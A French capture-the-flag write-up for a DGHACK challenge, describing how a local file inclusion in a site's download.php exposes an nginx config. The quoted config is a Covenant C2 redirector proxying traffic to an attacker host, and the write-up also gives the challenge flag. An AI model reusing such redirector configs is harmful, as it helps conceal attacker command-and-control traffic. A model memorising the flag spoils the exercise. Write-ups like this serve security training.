
# Un chasseur sachant chasser - partie 1

## Description

Des analystes SOC du Ministère des Armées ont remarqué des flux suspects provenant de machines internes vers un site vitrine d'une entreprise. Pourtant ce site semble tout à fait légitime.

Vous avez été mandaté par la Direction Générale de l'Armement pour mener l'enquête. Trouvez un moyen de reprendre partiellement le contrôle du site web afin de trouver comment ce serveur joue un rôle dans l'infrastructure de l'acteur malveillant.

Aucun fuzzing n'est nécessaire.

Le flag se trouve sur le serveur à l'endroit permettant d'en savoir plus sur l'infrastructure de l'attaquant.

http://unchasseursachantchasser.chall.malicecyber.com/


## Solution

Le site nous affiche ceci :

![](burger.png)

Le code source semble être un mélange de PHP et de HTML. On se concentre sur les scripts PHP et on a un bon candidat avec `download.php` qui semble utilisé pour récupérer des fichiers du site. En effet, il contient [une LFI](https://www.acunetix.com/blog/articles/local-file-inclusion-lfi/) qui permet de récupérer n'importe quel fichier du serveur.

On récupère plein de fichiers usuels sans trop de réussite. C'est pourtant la bonne piste comme l'indique un message sur le Discord:
> Il y a pas de guessing. Le flag est dans un fichier classique du système d'exploitation. Pas dans un /flag.txt, ce serait précisé sinon. Il suffit de bien chercher.

C'est finalement dans `/etc/nginx/nginx.conf` qu'on trouve notre bonheur :
```
        # This rule is to become our redirector c2.
        # Covenant 5.0 works on a Linux docker.
        # The GRUNT port must be tcp/8000-8250.
        # DGHACK{L3s_D0ux_Burg3r5_se_s0nt_f4it_pwn_:(}
        location ^~ /1d8b4cf854cd42f4868849c4ce329da72c406cc11983b4bf45acdae0805f7a72 {
            limit_except GET POST PUT { deny all; }
            rewrite /1d8b4cf854cd42f4868849c4ce329da72c406cc11983b4bf45acdae0805f7a72/(.*) /$1  break;
            proxy_pass https://covenant-attacker.com:7443;
        }
```